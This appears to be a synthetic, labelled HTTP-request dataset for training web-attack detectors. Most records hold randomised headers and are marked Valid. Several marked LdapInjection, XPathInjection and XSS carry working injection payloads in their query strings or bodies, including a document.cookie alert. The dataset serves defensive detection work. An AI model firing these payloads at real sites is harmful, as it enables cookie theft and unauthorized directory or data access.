Via: 8.9 158.127.183.209:97825, 1.7 87.159.74.130:436
Transfer-Encoding: identity
Upgrade: PwodS/1.9, ioHu/9.4, qtRd/1.2, ipob/0.8, Hcsnyh/2.2
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 4796093744
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40512
Start - Id: 23169
class: Valid
GET /OP6Eu7httpsIaccept/wlqXzLAtmh/nWR@riW2mObikHU1ry/tu1gahsz/al/ahloadotitraShaqSeww/childfHi.dll?qn=da&0pnpigea=dtCrnetcatw%3E&skeztalntt6aee=1emlcT7oe&anina=samoea&falIxB=01&iZeaQwp-Ksamz=994&llt1u1uumtye=fo&n04=r7gahtt HTTP/1.0
Host: www.jopn4ii.st
Connection: lb4swtdy
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: l-oe, eeI-cdaee
Cache-Control: max-stale
Client-ip: 86.43.140.192
Cookie: 6J3S=vsnetns;mh3yp(pn;orEefehdssftsa=tg
Cookie2: $Version="920"
Date: Sun, 18 Jan 09 09:12:34 GMT
ETag: W/"EQvmylPqDP6@n8j@fVs"
Expect: uecdaahb=oeNot
From: ytscaT@osoeia.cz
If-Modified-Since: Fri, 05 Aug 05 10:37:03 CET
If-Unmodified-Since: Fri, 30 May 08 20:19:52 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Dec 05 14:02:13 CET
Max-Forwards: 83
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: ariihf uAaec=elRxHnr
Authorization: Digest nc=5C4914df
Range: -362684,26-
Referer: /iEt1G5o/trhelsoy/eoatT5.nsf
TE: gzip;q=0.8,trailers
Trailer: If-Unmodified-Since
User-Agent: jzUZk-KZS@ http://www.ilsdN9c1.fr
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 955x1403
Via: HTTP/0.4 229.80.62.23
Transfer-Encoding: deflate
Upgrade: aeo6t/4.4, matg/8.3, 0dn/5.9, uoO/0.4
Warning: 412 www.Fsjawe.gif "ecfj" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 76690909
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 23169
Start - Id: 34251
class: Valid
POST /ahbGizM-/hltgiienSieeee/i.@7MKFHzcjAZ7kSct.png? HTTP/1.0
Content-Length: 122
Content-Language: cl,coFf
Content-Encoding: deflate
Content-Location: http://bHtvsaq.de/ojirO5t/i4rdzo/caoMgib.exe
Content-MD5: ZWFvNm5hdXR4ZW50VW95ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 Jul 06 03:56:48 GMT
Last-Modified: Wed, 18 Mar 09 20:16:24 CET
Host: 160.167.212.14
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.1, identity;q=0.8
Accept-Language: shcsn6e-a1vt;q=0.7, eleglehn-f7hrt
Cache-Control: min-fresh=2018
Client-ip: 203.243.153.73
Cookie: iilHbsesJh=nerN4uOS;rur=p5Ttislot=;dteo12=+y+htacces
Cookie2: $Version="83"
Date: Mon, 09 Feb 09 10:21:35 GMT
ETag: W/"2hP-K@vQhTudBKeDn1G"
Expect: 100-continue
From: uoRceh@bnhno.gov
If-Modified-Since: Thu, 04 Sep 08 16:05:13 CET
If-Unmodified-Since: Wed, 06 Sep 06 04:15:54 GMT
If-Match: *
If-None-Match: "9wZwDxFPjb--nR8ko"
If-Range: "O_6Yk_YlWItGH2EO"
Max-Forwards: 33
MIME-Version: 7.6
Pragma: oaeXaD='1e0G6'
Proxy-Authorization: Digest username="rtalafh1"
Authorization: Digest cnonce="tuoe"
Range: -804943,968106-
Referer: http://eigi.com/Se4n/herels.asmx
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: lOse (4OM1UHsw7h; hXFsyeQH; w7qxAlYmJD)
UA-CPU: 68000
UA-Disp: 1874,1837,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5781x4344
Via: y8enJn/6.7 71.205.252.170
Transfer-Encoding: deflate
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 954 www.nnennttt.js "hztaw" "Sat, 16 Oct 04 21:52:44 UTC"
X-Forwarded-For: 70.193.7.214
X-Serial-Number: 316874692201616
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fthtoa6ooIncee=]gl7q&wghetorwc975ytm=d3d3igihpotsdrn&onlerd=e3a services&hfaNpnn67iac=hvW_O_&iiNiCihEienwN=  n&o0=ishxss

End - Id: 34251
Start - Id: 37627
class: LdapInjection
POST /cehm/P5o_pMscript3rjnetcatJG8/aTieerhrrJ27kupojnQ/pacxec6e2bi4emd1y/o30gH29zf.gif? HTTP/1.1
Content-Length: 259
Content-Language: s
Content-Encoding: compress
Content-Location: http://www.04tibr.it/Eutt/aqMA.asmx
Content-MD5: NGFtMnJvb3NuZXdnanVldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Apr 06 11:31:02 CET
Last-Modified: Tue, 27 Jul 04 09:11:38 GMT
Host: www.1dar.de
Connection: geeyan
Accept: */*
Accept-Charset: x-mac-icelandic, x-mac-korean, iso-8859-1;q=0.7, windows-1254;q=0.7
Accept-Encoding: 
Accept-Language: nhuAj-eiuqh;q=0.2, it-F4gz
Cache-Control: no-cache
Client-ip: 236.109.120.226
Cookie: im0d8isphn=602658394;7i7tLihfkbci=gq0rier;eeisrAOi77z3a=eti;5fqk9egloukhnmb=e9evoo2&h;etRaela9t2phmt=45
Cookie2: $Version="0"
Date: Sun, 29 Nov 09 05:22:57 UTC
ETag: "KfxfT3tTG8FqR3r5"
Expect: 100-continue
From: eVgdo@tlh3.net
If-Modified-Since: Fri, 01 Jul 05 04:32:49 UTC
If-Unmodified-Since: Sat, 24 Dec 05 03:52:41 CET
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: "5FSjhDuT7b2BQUdJ"
If-Range: Sat, 22 May 04 11:16:44 GMT
Max-Forwards: 2034
MIME-Version: 4.3
Pragma: ta5='Esntprns'
Proxy-Authorization: Digest username="pitaah"
Authorization: Basic QWFvZzptUmFwZGk=
Range: -6153,297-,439-473
Referer: http://www.rrls.de/Xet7rose/dotolerl/oeqaprr/rs7ss.exe
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: hITP2dn2 http://www.6yaos.ch
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: 8rn/1.4 41.198.61.104, HTTP/9.2 222.59.204.93
Transfer-Encoding: gzip
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

XToadihs=9202&hvn8ecsee=t:1[tc&shnnnh=htstdin&erhse=b.tLyIz6&ehhThkiholw=0&yj= ih&Ri4rrgci=r5eo&w95dwErsiymhvez=a a&Ofenetimm=ifYDgiwAY0hG&ktogS=93&khomeTM8=mscriptE?E&mg4=)    (    |   (  cn=*o   'brien*    )(mail   =*o'brien*   )

End - Id: 37627
Start - Id: 38879
class: LdapInjection
GET /ir/tuONw/tiwhRm3cxntyg6lmlde/mrdTNAPOx6w@h@fl/hpsYwtYZlF.tiff?sosmHl9o9td=%29++++%28++%7C+++%28displayName%3Dhad*%29++++%28name++%3D+had*++++%29%28+mail%3Dhad*+%29 HTTP/1.1
Host: 110.65.149.181
Connection: dipt
Accept: */*
Accept-Charset: macintosh, x-mac-turkish;q=0.8, iso-10646-ucs-2, iso-8859-8-i
Accept-Encoding: gzip, identity, identity;q=0.5, identity
Accept-Language: *;q=0.4
Cache-Control: max-age=5
Client-ip: 206.129.188.199
Cookie: hluNit=sYl;CexecKQbcatZI=5ecemrl;ossb=22;RVGZG7=i8rEnr\;fu8USckbRAR=re(;V_PQ=535818655
Cookie2: $Version="380"
Date: Sun, 07 Mar 04 22:01:47 CET
ETag: W/"tVhWFQtdP2iMT@NE.l"
Expect: onveaEc=boIat;tlR2=6o2r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sun, 13 May 07 11:55:06 UTC
If-Unmodified-Since: Tue, 21 Apr 09 17:39:38 CET
If-Match: "me2C6EiJeYW.QQY.Rk3a"
If-None-Match: *
If-Range: Sun, 20 Mar 05 03:02:42 CET
Max-Forwards: 3764
MIME-Version: 1.2
Pragma: avqey=srneu
Proxy-Authorization: Basic dGFkZmhzOnR2anRr
Authorization: Basic RXlsb25vZWU6aHJsc3hh
Range: 15934-,799-8058,-81465
Referer: /annke/f6oxaepW.sh
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.0 (compatible; MSIE 9.6; SunOS sun4u; 8tloaae; adsssHc)
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: 7.7 www.smftmxv.tiff, FTP/3.3 223.161.207.227
Transfer-Encoding: gzip
Upgrade: ccso6g/3.3, rnca/7.0, aaeu/2.0, rjeGo/0.6, umim3u/7.7
Warning: 605 205.123.17.49:63776 "cb6tsipI2WEtibtnMi" "Mon, 26 Sep 05 17:29:00 CET"
X-Forwarded-For: 5.149.24.84
X-Serial-Number: 9521103915785136495
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38879
Start - Id: 30687
class: Valid
GET /nusP/usri/acceptZxm7EeysesW.msf?wteemoeehto=62097394&UBW9mailDk_1F=t2a5&eyTetav6ef=299531&nE9=g4FUJh8p&gahnlthyt7ng9=hIh&lese=70682&uauno=9&j5aGzoswrlmho=6&ny=dx1gttofr7oglTpGa&GnqQX=esunvs&yA=to+rwhhttpsi+Etowne&pxwd4i=7glf&asMaAtmp=0970&en=sB9&kn1loLsosqsb=02407453 HTTP/1.0
Host: 36.247.113.149
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-15, windows-1253, ks_c_5601-1987, x-mac-hebrew;q=0.6
Accept-Encoding: identity, gzip, identity;q=0.5
Accept-Language: Rt4pie-aBaoJco, z3-tje8Tt, aleaoe-3cso;q=0.7
Cache-Control: min-fresh=188
Client-ip: 201.78.129.149
Cookie: w4srOga=t8l0hhr
Cookie2: $Version="5"
Date: Sun, 30 Oct 05 21:33:30 GMT
ETag: W/"Kc4B2yCixSefOHc"
Expect: Selo0dy=sc1LteA
From: aeec@eeAs.fr
If-Modified-Since: Mon, 04 Dec 06 06:31:49 UTC
If-Unmodified-Since: Sun, 13 Jun 04 02:48:29 CET
If-Match: "sdX6m8_IsZAlrlYpUw"
If-None-Match: *
If-Range: "05HYDEvEBPw@.77a.5OI"
Max-Forwards: 60
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM NTdudWg3Ym5obGFlMFR2ZWliaXNhYWR0NHR4NTRhcnNvSXRhbw==
Authorization: Basic eWVuc2ZlaW86aXVkWXRzbw==
Range: 174-63482
Referer: /tdjblear/icss/ao1atpao.swf
TE: trailers,trailers,deflate
Trailer: Upgrade
User-Agent: te4aoaa/6.2.3
UA-CPU: MIPS
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7462x1873
Via: 8.9 7.244.61.105, FTP/4.5 www.boaI.jpeg, HTTP/6.6 187.224.114.237
Transfer-Encoding: TaeotE; a6ve=Uyinisn
Upgrade: nrr/7.3, ssae/3.9, Uaehed/6.1
Warning: 212 www.aeeaeyio.jpg "iorto9Sgs" "Wed, 05 Nov 08 05:06:08 GMT"
X-Forwarded-For: 90.32.42.192
X-Serial-Number: 62673072943112918
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30687
Start - Id: 49298
class: XPathInjection
GET /oedmipydnehsqte9hKso/TM.html?pec=Phpbcn%27+++or+++++6+++++%3C+++count%28path%2Fchild%3A%3A*%29+++++or+++%270A%27+%3D+%27&tsorsq=+%29like&xmlUSj=7&gt=weaaeBuy&OoEssl6m3l8eih=%2Fs2lyeeimgandm&g2LL6=insert&0HPP2P=mj5oeyeeiq&teTit8isq=dtsef HTTP/1.1
Host: www.jlupEn.st
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-greek, iso-8859-2;q=0.3
Accept-Encoding: *
Accept-Language: rd-estiIAem, n5-Hoqasb;q=0.1, mnee7wtt-iduEhyT, 3cl-twrn, soOgei-amH
Cache-Control: no-transform
Client-ip: 249.173.49.26
Cookie: arh=9;uoemerdEB=23684;aa=txmlobjectidl;gyd=h deleteuu;tear8el=8sh
Cookie2: $Version="336"
Date: Sun, 30 Dec 07 16:04:56 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 30 Jul 04 24:56:24 CET
If-Unmodified-Since: Thu, 26 May 05 06:10:19 CET
If-Match: "P1aBp.6U._P3HMFw5s5j"
If-None-Match: *
If-Range: *
Max-Forwards: 29
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: -843
Referer: http://1edss.org/v9ktt7r/epeln/ofOaHyi/aase/xreyoEAd.pl
TE: chunked
Trailer: Trailer
User-Agent: bKeepGt
UA-CPU: MIPS
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7516x496
Via: 8.7 www.R8ag.htm
Transfer-Encoding: identity
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 104.98.97.132
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49298
Start - Id: 47035
class: XSS
GET /UdD/JeH/ntt5we4hee8neottad1a/2m4ma/sceuene7res0tTeqi7o/af/n9.htm?msrfob7=qey%28catreplace&mbtdtlsUz1sd=oet%22++++%3E%3Cbody%2520onload%3Dalert++%28document.cookie%29%3B++%3E&TtTt=ay&enaImcdhaced=031534273&Fc=11473937 HTTP/1.1
Host: 211.74.49.232:5
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: compress, identity;q=0.5, identity, compress;q=0.1
Accept-Language: *
Cache-Control: max-age=07123
Client-ip: 71.223.100.67
Cookie: saa=%unlogR;tfelaeolpoLAaG=7;deao8e6=501543;sgshneichtNeshs=r
Cookie2: $Version="34"
Date: Wed, 01 Sep 04 11:40:30 CET
ETag: W/"Wv1N7CAcXp.A1d0q"
Expect: tbosO4uw=ourpoii
From: ariNbe@hsyoEoop.ch
If-Modified-Since: Wed, 04 Aug 04 18:38:53 UTC
If-Unmodified-Since: Tue, 06 Mar 07 23:19:30 UTC
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: *
If-Range: *
Max-Forwards: 8021
MIME-Version: 5.6
Pragma: df='h'
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: le3Wia ksntt6=tuamnen
Range: 127-39590,86298-2
Referer: /mAg9n/z6ef0p6/epoit/aaehlt/untaa.asp
TE: trailers,gzip;q=0.3,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.2 (X11; U; Linux i386 1.9; rs-ec; rv:9.0.8) Gecko/94119549
UA-CPU: MIPS
UA-Disp: 753,986,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7231x6416
Via: HTTP/8.0 200.174.134.114, FTP/1.8 www.du0tile.tiff:3, 2.5 www.ronTtrio.js
Transfer-Encoding: n6ea
Upgrade: wYxhkr/3.9
Warning: 182 www.tsTbr1.png "pkoij" "Thu, 09 Feb 06 08:59:39 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47035
Start - Id: 12123
class: Valid
GET /ih8jqTYLn/nVnqsDsIlo0/goenxAm/sre7aaioteh.php3?ikhvA=dyedQ&se4enowo9ah=651789217&ijxd86Wi=documentzki0wuae%26evalyqt+r%7E&saarsimtdx2=elYSQ&Vhpegecfrtatet=491099 HTTP/1.0
Host: 79.61.168.206:80
Connection: a4md
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 209.137.210.81
Cookie: XpGsxQandK=vPipOnenfleumc
Cookie2: $Version="1"
Date: Thu, 15 Oct 09 19:58:30 CET
ETag: W/"ho5Sih9G.uvcpPYV"
Expect: 100-continue
From: 1ygx3rl@zebdo07.net
If-Modified-Since: Fri, 26 Mar 10 15:32:59 UTC
If-Unmodified-Since: Sun, 30 Sep 07 19:47:33 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Nov 05 13:18:26 CET
Max-Forwards: 157
MIME-Version: 9.6
Pragma: i6e5=r
Proxy-Authorization: Digest nonce
Authorization: NTLM NmltbTNnbmU0YXRnZm9mdHJ0bG9zaW5kcjZMYTBBNm9kT2llaW9zb3NhZWVwb2M5
Range: 2-
Referer: http://www.nItlfi3.de/rs0Z/Meino/3nxrw8/noty.nsf
TE: chunked,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.0 (X11; U; Linux i586 9.1; nd-no; rv:0.8.6) Gecko/54914373
UA-CPU: MIPS
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 556x8407
Via: FTP/6.5 www.iseu.jpg
Transfer-Encoding: rqooHi; xr7lRpec=eee7etb
Upgrade: Cdr/9.5, gton/2.2
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 192.179.67.70
X-Serial-Number: 180006771831212
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12123
Start - Id: 48081
class: XSS
GET /e@yh_IE2i/je3V8rm3kDexecuT/rp/jc/wbZ1oyNjVkyIQ2H/iwosen0a/jXjYP6iupdateHmeta/r4ey_MSDMJ./n2PtOAr/tbIs32TgnvVe-c/ht4dsfnWa/dpxby.gif?hrrL=h9aitNooNstetoChpc&orecxeffoelEeoi=837&isu=5259&wftpfchildsz=ihiatavfne&oiE=befteopnioe&a1j0uoriDi=48200133&ehpi=a%2Bbr&sioeet4sbp=7IbNklMMr&o0JJbexec=%3Cbgsound+++++src+++%3D++%22+++++javascript%3A++%5Balert+%28%27shseml3aMu%27%29%3B%5D%22+%3E&iuitho=deiaooa2eufght&7sdEnusu=1316594265&CRvFU8DH6=171401421&pihRn4oroii=lNFe.nZ-y3Xt HTTP/1.1
Host: www.muahmSpbwh.cz
Connection: close
Accept: application/*, video/mpeg;q=0.9
Accept-Charset: x-mac-chinesesimp, utf-7, iso-8859-1, x-mac-korean;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: w-aioeplch;q=0.7, ntd-1a2test
Cache-Control: min-fresh=358
Client-ip: 220.26.106.26
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="5"
Date: Fri, 25 Jun 04 09:26:57 UTC
ETag: "U9-YQ6G4Lm_.cAH"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Sat, 12 Jul 08 18:49:49 CET
If-Unmodified-Since: Sat, 07 Jul 07 10:37:52 CET
If-Match: "78vwAGbDNFfLif_UkWJ"
If-None-Match: "fuoh7eEbTW7LhPidu"
If-Range: *
Max-Forwards: 191
MIME-Version: 2.5
Pragma: aEa2inQh='m6lhiTte'
Proxy-Authorization: NTLM ZXR0eWNlYWNlcmNHZ2dsZU95ZWJpcnNobk93aDZ6aThldGZudG4=
Authorization: Rucfn yksNds=e8tWg
Range: -179295,540225-63
Referer: /2iiales/icaabmn/s1teyurG/pdo5.mpeg
TE: trailers
Trailer: Referer
User-Agent: 2hQi/4.5
UA-CPU: StrongARM
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: 7.0 www.tsat.htm, 4.6 www.lh03.css
Transfer-Encoding: compress
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 125 99.127.238.144 "ioisG0" "Sun, 22 Oct 06 11:55:13 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48081
Start - Id: 30669
class: Valid
GET /TdTXRp8oB/myusr/ijKA.WpR/ieqW3/hmRAlbHHsrx4JP/oo4sl9LDobnKltfGqfl/dS1Crx2DooWK0NFOYP/gdBazNmRfWs1Vo@Ub/02Q5Q_d/e68eecuYedhe/70yimHU8P.gif?tEr=D&Onhin0tfg4Dsa=6&jme1nmtoeanase=846250&syho=ae8rarrtndeleteW3Ret&elce24w20ttE=rbraHthnneehtLd&Lgimg28MAp2dBN=tmkAW9aL&hyT=ceansejabodyad4nwz&2btn9Hrt0l0Rit=958&tocoPAtueo=4722&j7@3tbin7K7hY-=Noe0au1&ynfienWi1ehEte=%3CcElicd7&krQ7.=sht&blraierwilY=l0W6o%5Do+M%3F&nieeoitlwnW=8NatHe HTTP/1.1
Host: www.9dy783.cz
Connection: keep-alive
Accept: text/xml
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 78.145.112.44
Cookie: hEairAs8hcha9=psmal;.3Oeval8onP=acd9A;zIaouiap=End?ort n4cdsu7;doE=21;drEoHeD=eeieO;hpgsniOomsAWtTe=hhs
Cookie2: $Version="8"
Date: Wed, 16 Jun 04 21:04:12 GMT
ETag: W/"oh1wEY@upMY@dYuAu"
Expect: 100-continue
From: Sunw8ia@ecjo.be
If-Modified-Since: Sat, 25 Oct 08 02:17:28 GMT
If-Unmodified-Since: Thu, 13 Oct 05 04:11:37 GMT
If-Match: "P_mFhaKFWUuuiqcM"
If-None-Match: *
If-Range: Fri, 19 Feb 10 08:01:54 UTC
Max-Forwards: 4
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Rqofot Oaywp=2hbltt
Range: 94999-335,42-,857-84995
Referer: http://www.tdeNaiae.de/dbaTen/cyayDsAh/9Koby/Tpuotc/nswr.jpeg
TE: trailers,deflate,trailers
Trailer: Cache-Control
User-Agent: ixsr (ncuULK; iXgoXp4m; 8uYrBNlS; l5PklEvP)
UA-CPU: PowerPC
UA-Disp: 9503,087,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7462x1873
Via: 4.3 www.oc4tnn.shtml, 8.5 1.124.247.86, 1.4 247.124.70.176
Transfer-Encoding: gzip
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 834 64.62.125.81 "mrreedes" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 62673072943112918
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 30669
Start - Id: 24907
class: Valid
GET /eeit.asp?telnetXh6p=rd7ccViYfNk8&e25y5e9nnaicnnt=i5T&aeRrege3acA9=openSi&oHs=e.Fsr9 HTTP/1.0
Host: www.msaaAtlin.de
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=3890
Client-ip: 119.122.46.193
Cookie: nsnrsyio=60222962;D1Ql5script7y0uD=48971203;disew0r=:udeLyis;tadteodoBe=4660236417;togk=rwntpqholone
Cookie2: $Version="851"
Date: Thu, 08 Jan 04 04:53:07 GMT
ETag: ".wsneIeputA5cNgRm"
Expect: 0diAIo2=iagel
From: ieoterto@Haljdb.uk
If-Modified-Since: Tue, 04 May 10 19:02:14 UTC
If-Unmodified-Since: Wed, 03 Feb 10 13:02:29 CET
If-Match: "YDXh0ILPGKqk59p"
If-None-Match: "NIiqHlRkLlx5XV9TJ1"
If-Range: *
Max-Forwards: 4138
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: Basic MmV3czVzdXM6dGZzY3BlYQ==
Range: -19,-61236
Referer: /itsqs.sh
TE: deflate;q=0.4,trailers
Trailer: If-Range
User-Agent: Mozilla/7.0 (Windows; U; WinNT 9.4; Rr-ui; rv:8.3.7) Gecko/10425023
UA-CPU: MIPS
UA-Disp: 575,252,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 404x3241
Via: 4.7 65.55.207.247
Transfer-Encoding: bunlpi
Upgrade: sur/1.8, znripg/6.2, halyeo/7.1, osto/6.9
Warning: 430 178.33.189.66 "taE90anszeAies" "Thu, 03 Feb 05 22:56:19 CET"
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 5477334
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24907
Start - Id: 24019
class: Valid
GET /GscriptXconnectDE_0X24z8/doutenrnsr43qus/ot7arilsoicei/nPMjjehe7fsqc/uY-qXr_HnO/3s_kRAjwoj.n3xg/ymdHatoAi/NouIaahueiyrs/tl3mchaf1nE/h0shisra/x-/muhiirldtrslmfQDenre.shtml?ttoizln=passthrueeahe4+2systeml&heo2eeruyxnmn=See&syrntjymps=%7Clfoegb6s%27sN&ht=324 HTTP/1.0
Host: www.g9siti.biz:721
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eovujaI-t, sita-hi, T5exb-ahoy;q=0.3
Cache-Control: no-store
Client-ip: 172.138.38.160
Cookie: tna3mtabRt=92;yeuoeLetBddauo=47615;tifxp=2353204253;hi2dTodia=roo13hyrswaku;ytas6=nmh2ooa
Cookie2: $Version="34"
Date: Sun, 21 May 06 08:09:03 CET
ETag: W/"uQbDpyxUu5xg-3NLi"
Expect: 100-continue
From: 8ihnedd@EsreI51e7i.com
If-Modified-Since: Thu, 21 Dec 06 10:53:08 UTC
If-Unmodified-Since: Mon, 19 Apr 04 19:11:19 UTC
If-Match: "0UtSgi6OddYG90bq@U"
If-None-Match: "uaCfnUuxm_zqinTrq"
If-Range: Wed, 06 Feb 08 12:24:04 CET
Max-Forwards: 4
MIME-Version: 2.4
Pragma: erf=rpenr
Proxy-Authorization: NTLM cmhlYWVtbHJobkV5ZGVvaGl0U2Nzd28yemVvbGFyZlRoZTdRaGxSYXg=
Authorization: Digest nc=2453c1ac
Range: -2,64-,35201-
Referer: http://rdyombqN.cz/gelesYeg/eHdOw.jpg
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.2 (X11; U; Open BSD i386 0.6; si-ee; rv:5.1.7) Gecko/48377299
UA-CPU: PowerPC
UA-Disp: 4414,5382,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 314x0873
Via: FTP/5.5 183.79.151.128
Transfer-Encoding: gzip
Upgrade: h3rE/8.7, eogee/2.9, td0aa/8.5, toirs/3.2, Lme/4.0
Warning: 560 www.e6Dyu8.png "snbntciioi9G" "Wed, 08 Apr 09 10:48:35 GMT"
X-Forwarded-For: 160.213.124.93
X-Serial-Number: 54119
----: ------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 24019
Start - Id: 29280
class: Valid
GET /2R@RNo.WrkwQ7ReN1w/saa4atciiear/tsaAx/eOu6dank/ni0eHDtegomrnrMoc.gif? HTTP/1.1
Host: www.duacnh.uk:57
Connection: evdi
Accept: video/quicktime;q=0.6, text/*;q=0.9
Accept-Charset: windows-1255, iso-8859-8-i, utf-8, iso-8859-9, x-mac-turkish
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 49.75.184.213
Cookie: sehnl1u=3682
Cookie2: $Version="5"
Date: Mon, 11 Aug 08 10:14:30 UTC
ETag: "ZHdm6TYrWo@wSm@6fx"
Expect: tcdtgYe=eeseo;cdsr
From: oEub0ied@kr47.com
If-Modified-Since: Sun, 06 May 07 18:16:47 GMT
If-Unmodified-Since: Mon, 30 Mar 09 01:26:54 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 20 Feb 08 24:05:57 CET
Max-Forwards: 242
MIME-Version: 3.5
Pragma: NyteM='b'
Proxy-Authorization: Basic dHBlbE5mOnJjYkVlc0E=
Authorization: NTLM TXJ1YXNhS2NGb2NoOWFidGxwRHdtZlBOdHFlc3Q0NG9qZG52b2RLaHJzbQ==
Range: 254-
Referer: /ty9i7oC.bin
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.2 (Machintosh; U; Mac OS X 7.3; sE-ea; rv:1.8.9) Gecko/95112932
UA-CPU: StrongARM
UA-Disp: 7798,9897,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1569x604
Via: HTTP/2.4 247.60.163.2, 3.2 202.214.210.197, 6.2 www.Ard0.html
Transfer-Encoding: gzip
Upgrade: ttShEh/8.9, wdee/2.8, neeete/6.7
Warning: 783 107.227.6.97 "3ldiullnaotesre" 
X-Forwarded-For: 110.4.41.253
X-Serial-Number: 74768030946395
----: -----------------------------------------
